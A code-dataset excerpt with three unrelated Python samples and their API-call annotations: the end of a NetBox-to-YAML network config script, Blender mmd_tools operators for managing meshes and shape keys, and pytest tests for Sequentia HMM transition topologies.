structured_config["local_users"][user]["sha512_password"]= users[user]['password']
structured_config["local_users"][user]["role"]= users[user]['role']
structured_config["vrfs"] #TODO
structured_config["management_interfaces"] #TODO
structured_config["management_api_http"] #TODO
structured_config["ethernet_interfaces"] #TODO
structured_config["loopback_interfaces"] #TODO
structured_config["vlan_interfaces"] #TODO
structured_config["vxlan_interface"] #TODO
structured_config["prefix_lists"] #TODO
structured_config["route_maps"] #TODO
structured_config["router_bfd"] #TODO
structured_config["vlans"] #TODO
structured_config["ip_igmp_snooping"]["globally_enabled"]= True
structured_config["ip_virtual_router_mac_address"] = "00:00:00:00:00:01"
structured_config["virtual_source_nat_vrfs"] #TODO
output=yaml.dump(ddict2dict(structured_config), allow_unicode=True, default_flow_style=False)
print(output) | [
"pynetbox.api",
"collections.defaultdict"
] | [((429, 488), 'pynetbox.api', 'pynetbox.api', ([], {'url': 'nburl', 'token': 'NETBOX_TOKEN', 'threading': '(True)'}), '(url=nburl, token=NETBOX_TOKEN, threading=True)\n', (441, 488), False, 'import pynetbox\n'), ((579, 597), 'collections.defaultdict', 'defaultdict', (['ddict'], {}), '(ddict)\n', (590, 597), False, 'from collections import defaultdict\n')] |
# -*- coding: utf-8 -*-
import re
import bpy
from bpy.types import Operator
from collections import OrderedDict
from mmd_tools import utils
from mmd_tools.core import model as mmd_model
from mmd_tools.core.morph import FnMorph
from mmd_tools.core.material import FnMaterial
PREFIX_PATT = r'(?P<prefix>[0-9A-Z]{3}_)(?P<name>.*)'
class CleanShapeKeys(Operator):
bl_idname = 'mmd_tools.clean_shape_keys'
bl_label = 'Clean Shape Keys'
bl_description = 'Remove unused shape keys of selected mesh objects'
bl_options = {'PRESET'}
@classmethod
def poll(cls, context):
return len(context.selected_objects) > 0
@staticmethod
def __can_remove(key_block):
if key_block.relative_key == key_block:
return False # Basis
for v0, v1 in zip(key_block.relative_key.data, key_block.data):
if v0.co != v1.co:
return False
return True
def __shape_key_clean(self, context, obj, key_blocks):
for kb in key_blocks:
if self.__can_remove(kb):
obj.shape_key_remove(kb)
def __shape_key_clean_old(self, context, obj, key_blocks):
context.scene.objects.active = obj
for i in reversed(range(len(key_blocks))):
kb = key_blocks[i]
if self.__can_remove(kb):
obj.active_shape_key_index = i
bpy.ops.object.shape_key_remove()
__do_shape_key_clean = __shape_key_clean_old if bpy.app.version < (2, 75, 0) else __shape_key_clean
def execute(self, context):
for ob in context.selected_objects:
if ob.type != 'MESH' or ob.data.shape_keys is None:
continue
if not ob.data.shape_keys.use_relative:
continue # not be considered yet
key_blocks = ob.data.shape_keys.key_blocks
counts = len(key_blocks)
self.__do_shape_key_clean(context, ob, key_blocks)
counts -= len(key_blocks)
self.report({ 'INFO' }, 'Removed %d shape keys of object "%s"'%(counts, ob.name))
return {'FINISHED'}
class SeparateByMaterials(Operator):
bl_idname = 'mmd_tools.separate_by_materials'
bl_label = 'Separate by materials'
bl_description = 'Separate by materials'
bl_options = {'PRESET'}
clean_shape_keys = bpy.props.BoolProperty(
name='Clean Shape Keys',
description='Remove unused shape keys of separated objects',
default=True,
)
@classmethod
def poll(cls, context):
obj = context.active_object
return obj and obj.type == 'MESH'
def invoke(self, context, event):
vm = context.window_manager
return vm.invoke_props_dialog(self)
def execute(self, context):
obj = context.active_object
root = mmd_model.Model.findRoot(obj)
if root and root.mmd_root.editing_morphs > 0:
bpy.ops.mmd_tools.clear_temp_materials()
bpy.ops.mmd_tools.clear_uv_morph_view()
self.report({ 'WARNING' }, "Active editing morphs were cleared")
# return { 'CANCELLED' }
if root:
# Store the current material names
rig = mmd_model.Model(root)
mat_names = [mat.name for mat in rig.materials()]
utils.separateByMaterials(obj)
if self.clean_shape_keys:
bpy.ops.mmd_tools.clean_shape_keys()
if root:
rig = mmd_model.Model(root)
# The material morphs store the name of the mesh, not of the object.
# So they will not be out of sync
for mesh in rig.meshes():
if len(mesh.data.materials) == 1:
mat = mesh.data.materials[0]
idx = mat_names.index(mat.name)
prefix = utils.int2base(idx, 36)
prefix = '0'*(3 - len(prefix)) + prefix + '_'
ma = re.match(PREFIX_PATT, mesh.name)
if ma:
mesh.name = prefix + ma.group('name')
else:
mesh.name = prefix + mesh.name
if root and len(root.mmd_root.material_morphs) > 0:
for morph in root.mmd_root.material_morphs:
mo = FnMorph(morph, mmd_model.Model(root))
mo.update_mat_related_mesh()
utils.clearUnusedMeshes()
return {'FINISHED'}
class JoinMeshes(Operator):
bl_idname = 'mmd_tool.join_meshes'
bl_label = 'Join Meshes'
bl_description = 'Join the Model meshes into a single one'
bl_options = {'PRESET'}
@classmethod
def poll(cls, context):
obj = context.active_object
return obj and obj.type == 'MESH'
def execute(self, context):
obj = context.active_object
root = mmd_model.Model.findRoot(obj)
if root is None:
self.report({ 'ERROR' }, 'Select a MMD model')
return { 'CANCELLED' }
if root.mmd_root.editing_morphs > 0:
bpy.ops.mmd_tools.clear_temp_materials()
bpy.ops.mmd_tools.clear_uv_morph_view()
self.report({ 'WARNING' }, "Active editing morphs were cleared")
# Find all the meshes in mmd_root
rig = mmd_model.Model(root)
meshes_list = list(rig.meshes())
active_mesh = meshes_list[0]
bpy.ops.object.select_all(action='DESELECT')
act_layer = context.scene.active_layer
for mesh in meshes_list:
mesh.layers[act_layer] = True
mesh.hide_select = False
mesh.hide = False
mesh.select = True
bpy.context.scene.objects.active = active_mesh
# Store the current order of the materials
for m in meshes_list[1:]:
for mat in m.data.materials:
if mat and mat.name not in active_mesh.data.materials:
active_mesh.data.materials.append(mat)
# Store the current order of shape keys (vertex morphs)
__get_key_blocks = lambda x: x.data.shape_keys.key_blocks if x.data.shape_keys else []
shape_key_names = OrderedDict([(kb.name, None) for m in meshes_list for kb in __get_key_blocks(m)])
shape_key_names = sorted(shape_key_names.keys(), key=lambda x: root.mmd_root.vertex_morphs.find(x))
FnMorph.storeShapeKeyOrder(active_mesh, shape_key_names)
active_mesh.active_shape_key_index = 0
# Join selected meshes
bpy.ops.object.join()
if len(root.mmd_root.material_morphs) > 0:
for morph in root.mmd_root.material_morphs:
mo = FnMorph(morph, rig)
mo.update_mat_related_mesh(active_mesh)
utils.clearUnusedMeshes()
return { 'FINISHED' }
class AttachMeshesToMMD(Operator):
bl_idname = 'mmd_tools.attach_meshes_to_mmd'
bl_label = 'Attach Meshes to Model'
bl_description = 'Finds existing meshes and attaches them to the selected MMD model'
bl_options = {'PRESET'}
@classmethod
def poll(cls, context):
obj = context.active_object
return obj and mmd_model.Model.findRoot(obj)
def execute(self, context):
root = mmd_model.Model.findRoot(context.active_object)
rig = mmd_model.Model(root)
armObj = rig.armature()
if armObj is None:
self.report({ 'ERROR' }, 'Model Armature not found')
return { 'CANCELLED' }
act_layer = bpy.context.scene.active_layer
meshes_list = (o for o in bpy.context.scene.objects
if o.layers[act_layer] and o.type == 'MESH' and o.mmd_type == 'NONE')
for mesh in meshes_list:
if mmd_model.Model.findRoot(mesh) is not None:
# Do not attach meshes from other models
continue
mesh.parent = armObj
return { 'FINISHED' }
def _normalize_mesh_names(meshes):
"""
Helper method that sets a prefix for the mesh objects for sorting
"""
for i, m in enumerate(meshes):
idx = utils.int2base(i, 36)
prefix = '0'*(3 - len(idx)) + idx + '_'
ma = re.match(PREFIX_PATT, m.name)
if ma:
m.name = prefix + ma.group('name')
else:
m.name = prefix + m.name
def _swap_prefixes(mesh1, mesh2):
mesh1_prefix = re.match(PREFIX_PATT, mesh1.name).group('prefix')
mesh1_name = re.match(PREFIX_PATT, mesh1.name).group('name')
mesh2_prefix = re.match(PREFIX_PATT, mesh2.name).group('prefix')
mesh2_name = re.match(PREFIX_PATT, mesh2.name).group('name')
mesh1.name = mesh2_prefix + mesh1_name
mesh2.name = mesh1_prefix + mesh2_name
class MoveModelMeshUp(Operator):
bl_idname = 'mmd_tools.move_mesh_up'
bl_label = 'Move Model Mesh Up'
bl_description = 'Moves the selected mesh up'
bl_options = {'PRESET'}
@classmethod
def poll(cls, context):
obj = context.active_object
return obj and mmd_model.Model.findRoot(obj)
def execute(self, context):
root = mmd_model.Model.findRoot(context.active_object)
rig = mmd_model.Model(root)
# First normalize the mesh names
_normalize_mesh_names(rig.meshes())
try:
current_mesh = context.scene.objects[root.mmd_root.active_mesh_index]
except Exception:
self.report({ 'ERROR' }, 'Mesh not found')
return { 'CANCELLED' }
# Find the previous mesh
prefix = re.match(PREFIX_PATT, current_mesh.name).group('prefix')[:-1]
current_idx = int(prefix, 36)
prev_mesh = rig.findMeshByIndex(current_idx - 1)
if current_mesh and prev_mesh and current_mesh != prev_mesh:
# Swap the prefixes
_swap_prefixes(current_mesh, prev_mesh)
return { 'FINISHED' }
class MoveModelMeshDown(Operator):
bl_idname = 'mmd_tools.move_mesh_down'
bl_label = 'Move Model Mesh Down'
bl_description = 'Moves the selected mesh down'
bl_options = {'PRESET'}
@classmethod
def poll(cls, context):
obj = context.active_object
return obj and mmd_model.Model.findRoot(obj)
def execute(self, context):
root = mmd_model.Model.findRoot(context.active_object)
rig = mmd_model.Model(root)
# First normalize the mesh names
_normalize_mesh_names(rig.meshes())
try:
current_mesh = context.scene.objects[root.mmd_root.active_mesh_index]
except Exception:
self.report({ 'ERROR' }, 'Mesh not found')
return { 'CANCELLED' }
# Find the next mesh
prefix = re.match(PREFIX_PATT, current_mesh.name).group('prefix')[:-1]
current_idx = int(prefix, 36)
next_mesh = rig.findMeshByIndex(current_idx + 1)
if current_mesh and next_mesh and current_mesh != next_mesh:
# Swap the prefixes
_swap_prefixes(current_mesh, next_mesh)
return { 'FINISHED' }
class ChangeMMDIKLoopFactor(Operator):
bl_idname = 'mmd_tools.change_mmd_ik_loop_factor'
bl_label = 'Change MMD IK Loop Factor'
bl_description = "Multiplier for all bones' IK iterations in Blender"
bl_options = {'PRESET'}
mmd_ik_loop_factor = bpy.props.IntProperty(
name='MMD IK Loop Factor',
description='Scaling factor of MMD IK loop',
min=1,
soft_max=10,
max=100,
options={'SKIP_SAVE'},
)
@classmethod
def poll(cls, context):
obj = context.active_object
return obj and obj.type == 'ARMATURE'
def invoke(self, context, event):
arm = context.active_object
self.mmd_ik_loop_factor = max(arm.get('mmd_ik_loop_factor', 1), 1)
vm = context.window_manager
return vm.invoke_props_dialog(self)
def execute(self, context):
arm = context.active_object
if '_RNA_UI' not in arm:
arm['_RNA_UI'] = {}
rna_ui = arm['_RNA_UI']
if 'mmd_ik_loop_factor' not in rna_ui:
rna_ui['mmd_ik_loop_factor'] = {}
prop = rna_ui['mmd_ik_loop_factor']
prop['min'] = 1
prop['soft_min'] = 1
prop['soft_max'] = 10
prop['max'] = 100
prop['description'] = 'Scaling factor of MMD IK loop'
old_factor = max(arm.get('mmd_ik_loop_factor', 1), 1)
new_factor = arm['mmd_ik_loop_factor'] = self.mmd_ik_loop_factor
for b in arm.pose.bones:
for c in b.constraints:
if c.type != 'IK':
continue
iterations = int(c.iterations * new_factor / old_factor)
self.report({ 'INFO' }, 'Update %s of %s: %d -> %d'%(c.name, b.name, c.iterations, iterations))
c.iterations = iterations
return { 'FINISHED' }
| [
"bpy.props.IntProperty",
"bpy.props.BoolProperty",
"mmd_tools.utils.separateByMaterials",
"mmd_tools.utils.clearUnusedMeshes",
"mmd_tools.core.model.Model",
"bpy.ops.mmd_tools.clear_temp_materials",
"bpy.ops.mmd_tools.clear_uv_morph_view",
"bpy.ops.object.select_all",
"mmd_tools.utils.int2base",
"... | [((2329, 2456), 'bpy.props.BoolProperty', 'bpy.props.BoolProperty', ([], {'name': '"""Clean Shape Keys"""', 'description': '"""Remove unused shape keys of separated objects"""', 'default': '(True)'}), "(name='Clean Shape Keys', description=\n 'Remove unused shape keys of separated objects', default=True)\n", (2351, 2456), False, 'import bpy\n'), ((11280, 11435), 'bpy.props.IntProperty', 'bpy.props.IntProperty', ([], {'name': '"""MMD IK Loop Factor"""', 'description': '"""Scaling factor of MMD IK loop"""', 'min': '(1)', 'soft_max': '(10)', 'max': '(100)', 'options': "{'SKIP_SAVE'}"}), "(name='MMD IK Loop Factor', description=\n 'Scaling factor of MMD IK loop', min=1, soft_max=10, max=100, options={\n 'SKIP_SAVE'})\n", (11301, 11435), False, 'import bpy\n'), ((2814, 2843), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['obj'], {}), '(obj)\n', (2838, 2843), True, 'from mmd_tools.core import model as mmd_model\n'), ((3303, 3333), 'mmd_tools.utils.separateByMaterials', 'utils.separateByMaterials', (['obj'], {}), '(obj)\n', (3328, 3333), False, 'from mmd_tools import utils\n'), ((4390, 4415), 'mmd_tools.utils.clearUnusedMeshes', 'utils.clearUnusedMeshes', ([], {}), '()\n', (4413, 4415), False, 'from mmd_tools import utils\n'), ((4840, 4869), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['obj'], {}), '(obj)\n', (4864, 4869), True, 'from mmd_tools.core import model as mmd_model\n'), ((5295, 5316), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (5310, 5316), True, 'from mmd_tools.core import model as mmd_model\n'), ((5404, 5448), 'bpy.ops.object.select_all', 'bpy.ops.object.select_all', ([], {'action': '"""DESELECT"""'}), "(action='DESELECT')\n", (5429, 5448), False, 'import bpy\n'), ((6365, 6421), 'mmd_tools.core.morph.FnMorph.storeShapeKeyOrder', 'FnMorph.storeShapeKeyOrder', (['active_mesh', 'shape_key_names'], {}), '(active_mesh, shape_key_names)\n', (6391, 6421), False, 'from mmd_tools.core.morph import FnMorph\n'), ((6509, 6530), 'bpy.ops.object.join', 'bpy.ops.object.join', ([], {}), '()\n', (6528, 6530), False, 'import bpy\n'), ((6745, 6770), 'mmd_tools.utils.clearUnusedMeshes', 'utils.clearUnusedMeshes', ([], {}), '()\n', (6768, 6770), False, 'from mmd_tools import utils\n'), ((7230, 7277), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['context.active_object'], {}), '(context.active_object)\n', (7254, 7277), True, 'from mmd_tools.core import model as mmd_model\n'), ((7292, 7313), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (7307, 7313), True, 'from mmd_tools.core import model as mmd_model\n'), ((8098, 8119), 'mmd_tools.utils.int2base', 'utils.int2base', (['i', '(36)'], {}), '(i, 36)\n', (8112, 8119), False, 'from mmd_tools import utils\n'), ((8181, 8210), 're.match', 're.match', (['PREFIX_PATT', 'm.name'], {}), '(PREFIX_PATT, m.name)\n', (8189, 8210), False, 'import re\n'), ((9097, 9144), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['context.active_object'], {}), '(context.active_object)\n', (9121, 9144), True, 'from mmd_tools.core import model as mmd_model\n'), ((9159, 9180), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (9174, 9180), True, 'from mmd_tools.core import model as mmd_model\n'), ((10248, 10295), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['context.active_object'], {}), '(context.active_object)\n', (10272, 10295), True, 'from mmd_tools.core import model as mmd_model\n'), ((10310, 10331), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (10325, 10331), True, 'from mmd_tools.core import model as mmd_model\n'), ((2914, 2954), 'bpy.ops.mmd_tools.clear_temp_materials', 'bpy.ops.mmd_tools.clear_temp_materials', ([], {}), '()\n', (2952, 2954), False, 'import bpy\n'), ((2967, 3006), 'bpy.ops.mmd_tools.clear_uv_morph_view', 'bpy.ops.mmd_tools.clear_uv_morph_view', ([], {}), '()\n', (3004, 3006), False, 'import bpy\n'), ((3211, 3232), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (3226, 3232), True, 'from mmd_tools.core import model as mmd_model\n'), ((3380, 3416), 'bpy.ops.mmd_tools.clean_shape_keys', 'bpy.ops.mmd_tools.clean_shape_keys', ([], {}), '()\n', (3414, 3416), False, 'import bpy\n'), ((3452, 3473), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (3467, 3473), True, 'from mmd_tools.core import model as mmd_model\n'), ((5060, 5100), 'bpy.ops.mmd_tools.clear_temp_materials', 'bpy.ops.mmd_tools.clear_temp_materials', ([], {}), '()\n', (5098, 5100), False, 'import bpy\n'), ((5113, 5152), 'bpy.ops.mmd_tools.clear_uv_morph_view', 'bpy.ops.mmd_tools.clear_uv_morph_view', ([], {}), '()\n', (5150, 5152), False, 'import bpy\n'), ((7152, 7181), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['obj'], {}), '(obj)\n', (7176, 7181), True, 'from mmd_tools.core import model as mmd_model\n'), ((8390, 8423), 're.match', 're.match', (['PREFIX_PATT', 'mesh1.name'], {}), '(PREFIX_PATT, mesh1.name)\n', (8398, 8423), False, 'import re\n'), ((8457, 8490), 're.match', 're.match', (['PREFIX_PATT', 'mesh1.name'], {}), '(PREFIX_PATT, mesh1.name)\n', (8465, 8490), False, 'import re\n'), ((8524, 8557), 're.match', 're.match', (['PREFIX_PATT', 'mesh2.name'], {}), '(PREFIX_PATT, mesh2.name)\n', (8532, 8557), False, 'import re\n'), ((8591, 8624), 're.match', 're.match', (['PREFIX_PATT', 'mesh2.name'], {}), '(PREFIX_PATT, mesh2.name)\n', (8599, 8624), False, 'import re\n'), ((9019, 9048), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['obj'], {}), '(obj)\n', (9043, 9048), True, 'from mmd_tools.core import model as mmd_model\n'), ((10170, 10199), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['obj'], {}), '(obj)\n', (10194, 10199), True, 'from mmd_tools.core import model as mmd_model\n'), ((1384, 1417), 'bpy.ops.object.shape_key_remove', 'bpy.ops.object.shape_key_remove', ([], {}), '()\n', (1415, 1417), False, 'import bpy\n'), ((6660, 6679), 'mmd_tools.core.morph.FnMorph', 'FnMorph', (['morph', 'rig'], {}), '(morph, rig)\n', (6667, 6679), False, 'from mmd_tools.core.morph import FnMorph\n'), ((7726, 7756), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['mesh'], {}), '(mesh)\n', (7750, 7756), True, 'from mmd_tools.core import model as mmd_model\n'), ((3819, 3842), 'mmd_tools.utils.int2base', 'utils.int2base', (['idx', '(36)'], {}), '(idx, 36)\n', (3833, 3842), False, 'from mmd_tools import utils\n'), ((3934, 3966), 're.match', 're.match', (['PREFIX_PATT', 'mesh.name'], {}), '(PREFIX_PATT, mesh.name)\n', (3942, 3966), False, 'import re\n'), ((4314, 4335), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (4329, 4335), True, 'from mmd_tools.core import model as mmd_model\n'), ((9527, 9567), 're.match', 're.match', (['PREFIX_PATT', 'current_mesh.name'], {}), '(PREFIX_PATT, current_mesh.name)\n', (9535, 9567), False, 'import re\n'), ((10674, 10714), 're.match', 're.match', (['PREFIX_PATT', 'current_mesh.name'], {}), '(PREFIX_PATT, current_mesh.name)\n', (10682, 10714), False, 'import re\n')] |
import pytest, warnings, numpy as np
from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology
from ....support import assert_equal, assert_all_equal, assert_distribution
# Set seed for reproducible randomness
seed = 0
np.random.seed(seed)
rng = np.random.RandomState(seed)
# ========= #
# _Topology #
# ========= #
# --------------------------- #
# _Topology.uniform_initial() #
# --------------------------- #
def test_uniform_initial_min():
"""Generate a uniform initial state distribution with the minimum number of states"""
topology = _Topology(n_states=1, random_state=rng)
initial = topology.uniform_initial()
assert_distribution(initial)
assert_equal(initial, np.array([
1.
]))
def test_uniform_initial_small():
"""Generate a uniform initial state distribution with a few states"""
topology = _Topology(n_states=2, random_state=rng)
initial = topology.uniform_initial()
assert_distribution(initial)
assert_equal(initial, np.array([
0.5, 0.5
]))
def test_uniform_initial_many():
"""Generate a uniform initial state distribution with many states"""
topology = _Topology(n_states=5, random_state=rng)
initial = topology.uniform_initial()
assert_distribution(initial)
assert_equal(initial, np.array([
0.2, 0.2, 0.2, 0.2, 0.2
]))
# -------------------------- #
# _Topology.random_initial() #
# -------------------------- #
def test_random_initial_min():
"""Generate a random initial state distribution with minimal states"""
topology = _Topology(n_states=1, random_state=rng)
initial = topology.random_initial()
assert_distribution(initial)
assert_equal(initial, np.array([
1.
]))
def test_random_initial_small():
"""Generate a random initial state distribution with few states"""
topology = _Topology(n_states=2, random_state=rng)
initial = topology.random_initial()
assert_distribution(initial)
assert_equal(initial, np.array([
0.57633871, 0.42366129
]))
def test_random_initial_many():
"""Generate a random initial state distribution with many states"""
topology = _Topology(n_states=5, random_state=rng)
initial = topology.random_initial()
assert_distribution(initial)
assert_equal(initial, np.array([
0.15210286, 0.10647349, 0.20059295, 0.11120171, 0.42962898
]))
# ================== #
# _LeftRightTopology #
# ================== #
# ---------------------------------------- #
# _LeftRightTopology.uniform_transitions() #
# ---------------------------------------- #
def test_left_right_uniform_transitions_min():
"""Generate a uniform left-right transition matrix with minimal states"""
topology = _LeftRightTopology(n_states=1, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[1.]
]))
def test_left_right_uniform_transitions_small():
"""Generate a uniform left-right transition matrix with few states"""
topology = _LeftRightTopology(n_states=2, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.5, 0.5],
[0. , 1. ]
]))
def test_left_right_uniform_transitions_many():
"""Generate a uniform left-right transition matrix with many states"""
topology = _LeftRightTopology(n_states=5, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.2, 0.2 , 0.2 , 0.2 , 0.2 ],
[0. , 0.25, 0.25 , 0.25 , 0.25 ],
[0. , 0. , 0.33333333, 0.33333333, 0.33333333],
[0. , 0. , 0. , 0.5 , 0.5 ] ,
[0. , 0. , 0. , 0. , 1. ]
]))
# --------------------------------------- #
# _LeftRightTopology.random_transitions() #
# --------------------------------------- #
def test_left_right_random_transitions_min():
"""Generate a random left-right transition matrix with minimal states"""
topology = _LeftRightTopology(n_states=1, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[1.]
]))
def test_left_right_random_transitions_small():
"""Generate a random left-right transition matrix with few states"""
topology = _LeftRightTopology(n_states=2, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.23561633, 0.76438367],
[0. , 1. ]
]))
def test_left_right_random_transitions_many():
"""Generate a random left-right transition matrix with many states"""
topology = _LeftRightTopology(n_states=5, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.23169814, 0.71716356, 0.02033845, 0.02516204, 0.00563782],
[0. , 0.19474072, 0.16405008, 0.22228532, 0.41892388],
[0. , 0. , 0.42912755, 0.16545797, 0.40541448],
[0. , 0. , 0. , 0.109713 , 0.890287 ],
[0. , 0. , 0. , 0. , 1. ]
]))
# ----------------------------------------- #
# _LeftRightTopology.validate_transitions() #
# ----------------------------------------- #
def test_left_right_validate_transitions_invalid():
"""Validate an invalid left-right transition matrix"""
topology = _LeftRightTopology(n_states=5, random_state=rng)
transitions = _ErgodicTopology(n_states=5, random_state=rng).random_transitions()
with pytest.raises(ValueError) as e:
topology.validate_transitions(transitions)
assert str(e.value) == 'Left-right transition matrix must be upper-triangular'
def test_left_right_validate_transitions_valid():
"""Validate a valid left-right transition matrix"""
topology = _LeftRightTopology(n_states=5, random_state=rng)
transitions = topology.random_transitions()
topology.validate_transitions(transitions)
# -------------------------------------- #
# _ErgodicTopology.uniform_transitions() #
# -------------------------------------- #
def test_ergodic_uniform_transitions_min():
"""Generate a uniform ergodic transition matrix with minimal states"""
topology = _ErgodicTopology(n_states=1, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[1.]
]))
def test_ergodic_uniform_transitions_small():
"""Generate a uniform ergodic transition matrix with few states"""
topology = _ErgodicTopology(n_states=2, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.5, 0.5],
[0.5, 0.5]
]))
def test_ergodic_uniform_transitions_many():
"""Generate a uniform ergodic transition matrix with many states"""
topology = _ErgodicTopology(n_states=5, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.2, 0.2, 0.2, 0.2, 0.2],
[0.2, 0.2, 0.2, 0.2, 0.2],
[0.2, 0.2, 0.2, 0.2, 0.2],
[0.2, 0.2, 0.2, 0.2, 0.2],
[0.2, 0.2, 0.2, 0.2, 0.2]
]))
# ------------------------------------- #
# _ErgodicTopology.random_transitions() #
# ------------------------------------- #
def test_ergodic_random_transitions_min():
"""Generate a random ergodic transition matrix with minimal states"""
topology = _ErgodicTopology(n_states=1, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[1.]
]))
def test_ergodic_random_transitions_small():
"""Generate a random ergodic transition matrix with few states"""
topology = _ErgodicTopology(n_states=2, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.9474011 , 0.0525989 ],
[0.85567599, 0.14432401]
]))
def test_ergodic_random_transitions_many():
"""Generate a random ergodic transition matrix with many states"""
topology = _ErgodicTopology(n_states=5, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.58715548, 0.14491542, 0.20980762, 0.00623944, 0.05188205],
[0.0840705 , 0.23055049, 0.08297536, 0.25124688, 0.35115677],
[0.02117615, 0.37664662, 0.26705912, 0.09851123, 0.23660688],
[0.01938041, 0.16853843, 0.52046123, 0.07535256, 0.21626737],
[0.04996846, 0.44545843, 0.12079423, 0.07154241, 0.31223646]
]))
# --------------------------------------- #
# _ErgodicTopology.validate_transitions() #
# --------------------------------------- #
def test_ergodic_validate_transitions_invalid():
"""Validate an invalid ergodic transition matrix"""
topology = _ErgodicTopology(n_states=5, random_state=rng)
transitions = _LeftRightTopology(n_states=5, random_state=rng).random_transitions()
with pytest.warns(UserWarning):
topology.validate_transitions(transitions)
def test_ergodic_validate_transitions_valid():
"""Validate a valid ergodic transition matrix"""
topology = _ErgodicTopology(n_states=5, random_state=rng)
transitions = topology.random_transitions()
topology.validate_transitions(transitions)
# =============== #
# _LinearTopology #
# =============== #
# ------------------------------------- #
# _LinearTopology.uniform_transitions() #
# ------------------------------------- #
def test_linear_uniform_transitions_min():
"""Generate a uniform linear transition matrix with minimal states"""
topology = _LinearTopology(n_states=1, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[1.]
]))
def test_linear_uniform_transitions_small():
"""Generate a uniform linear transition matrix with few states"""
topology = _LinearTopology(n_states=2, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.5, 0.5],
[0. , 1. ]
]))
def test_linear_uniform_transitions_many():
"""Generate a uniform linear transition matrix with many states"""
topology = _LinearTopology(n_states=5, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.5, 0.5, 0. , 0. , 0. ],
[0. , 0.5, 0.5, 0. , 0. ],
[0. , 0. , 0.5, 0.5, 0. ],
[0. , 0. , 0. , 0.5, 0.5],
[0. , 0. , 0. , 0. , 1. ]
]))
# ------------------------------------ #
# _LinearTopology.random_transitions() #
# ------------------------------------ #
def test_linear_random_transitions_min():
"""Generate a random linear transition matrix with minimal states"""
topology = _LinearTopology(n_states=1, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[1.]
]))
def test_linear_random_transitions_small():
"""Generate a random linear transition matrix with few states"""
topology = _LinearTopology(n_states=2, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.65157396, 0.34842604],
[0. , 1. ]
]))
def test_linear_random_transitions_many():
"""Generate a random linear transition matrix with many states"""
topology = _LinearTopology(n_states=5, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.44455421, 0.55544579, 0. , 0. , 0. ],
[0. , 0.57553614, 0.42446386, 0. , 0. ],
[0. , 0. , 0.92014965, 0.07985035, 0. ],
[0. , 0. , 0. , 0.66790982, 0.33209018],
[0. , 0. , 0. , 0. , 1. ]
]))
# -------------------------------------- #
# _LinearTopology.validate_transitions() #
# -------------------------------------- #
def test_linear_validate_transitions_invalid():
"""Validate an invalid linear transition matrix"""
topology = _LinearTopology(n_states=5, random_state=rng)
transitions = _ErgodicTopology(n_states=5, random_state=rng).random_transitions()
with pytest.raises(ValueError) as e:
topology.validate_transitions(transitions)
assert str(e.value) == 'Left-right transition matrix must be upper-triangular'
def test_linear_validate_transitions_valid():
"""Validate a valid linear transition matrix"""
topology = _LinearTopology(n_states=5, random_state=rng)
transitions = topology.random_transitions()
topology.validate_transitions(transitions) | [
"sequentia.classifiers._Topology",
"sequentia.classifiers._LinearTopology",
"pytest.warns",
"sequentia.classifiers._LeftRightTopology",
"numpy.array",
"pytest.raises",
"numpy.random.seed",
"numpy.random.RandomState",
"sequentia.classifiers._ErgodicTopology"
